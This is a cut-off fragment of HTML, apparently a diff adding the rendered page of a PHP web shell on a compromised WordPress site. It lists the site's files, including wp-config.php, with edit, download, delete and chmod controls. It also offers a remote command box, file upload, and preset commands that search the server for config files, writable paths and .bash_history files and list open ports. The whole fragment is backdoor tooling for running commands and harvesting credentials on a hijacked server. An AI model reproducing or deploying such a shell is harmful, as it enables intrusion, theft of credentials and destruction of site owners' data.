onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox15" value="/var/www/html/wordpress/wp-config-sample.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config.php';document.todo.submit();">wp-config.php</a></td> +<td>1.21 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();">27.11.2009 23:08:37</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox16" value="/var/www/html/wordpress/wp-config.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-cron.php';document.todo.submit();">wp-cron.php</a></td> +<td>1.22 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();">04.11.2009 16:49:41</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox17" value="/var/www/html/wordpress/wp-cron.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-feed.php';document.todo.submit();">wp-feed.php</a></td> +<td>220 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox18" value="/var/www/html/wordpress/wp-feed.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links-opml.php';document.todo.submit();">wp-links-opml.php</a></td> +<td>1.9 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox19" value="/var/www/html/wordpress/wp-links-opml.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links.php';document.todo.submit();">wp-links.php</a></td> +<td>22.7 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();">14.01.2010 11:48:42</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox20" value="/var/www/html/wordpress/wp-links.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-load.php';document.todo.submit();">wp-load.php</a></td> +<td>2.29 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox21" value="/var/www/html/wordpress/wp-load.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-login.php';document.todo.submit();">wp-login.php</a></td> +<td>20.73 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox22" value="/var/www/html/wordpress/wp-login.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-mail.php';document.todo.submit();">wp-mail.php</a></td> +<td>6.95 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();">04.11.2009 16:49:39</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox23" value="/var/www/html/wordpress/wp-mail.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-pass.php';document.todo.submit();">wp-pass.php</a></td> +<td>487 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox24" value="/var/www/html/wordpress/wp-pass.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rdf.php';document.todo.submit();">wp-rdf.php</a></td> +<td>218 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox25" value="/var/www/html/wordpress/wp-rdf.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-register.php';document.todo.submit();">wp-register.php</a></td> +<td>316 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox26" value="/var/www/html/wordpress/wp-register.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss.php';document.todo.submit();">wp-rss.php</a></td> +<td>218 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox27" value="/var/www/html/wordpress/wp-rss.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss2.php';document.todo.submit();">wp-rss2.php</a></td> +<td>220 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox28" value="/var/www/html/wordpress/wp-rss2.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-settings.php';document.todo.submit();">wp-settings.php</a></td> +<td>21.02 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox29" value="/var/www/html/wordpress/wp-settings.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-trackback.php';document.todo.submit();">wp-trackback.php</a></td> +<td>3.39 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox30" value="/var/www/html/wordpress/wp-trackback.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">wp-xmlrpc.php</a></td> +<td>21.17 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">14.01.2010 10:59:48</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox31" value="/var/www/html/wordpress/wp-xmlrpc.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='xmlrpc.php';document.todo.submit();">xmlrpc.php</a></td> +<td>91.21 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox32" value="/var/www/html/wordpress/xmlrpc.php"></td> +</tr> +</table><hr size="1" noshade><p align="right"> + <script> + function ls_setcheckboxall(status) + { + var id = 0; + var num = 33; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 0; + var num = 33; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type="button" onclick="ls_setcheckboxall(1);" value="Select all">&nbsp;&nbsp;<input type="button" onclick="ls_setcheckboxall(0);" value="Unselect all"><b><select name=act><option value="ls">With selected:</option><option value=delete>Delete</option><option value=chmod>Change-mode</option></select>&nbsp;<input type=submit value="Confirm"></p></form></td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: Command execute ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>:: Select ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/var/www/html/wordpress/"><select name="cmd"><option value="ls -la">-----------------------------------------------------------</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="netstat -an | grep -i listen">show opened ports</option></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: Search ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: Upload ::</b><form method="POST" name="tod" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="file" name="uploadfile"><input type=submit name=submit value="Upload"><br><font color=green>[ ok ]</font></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="mkdir" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Create"><br><font color=green>[ ok ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="mkfile" size="50" value="/var/www/html/wordpress/"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><font color=green>[ 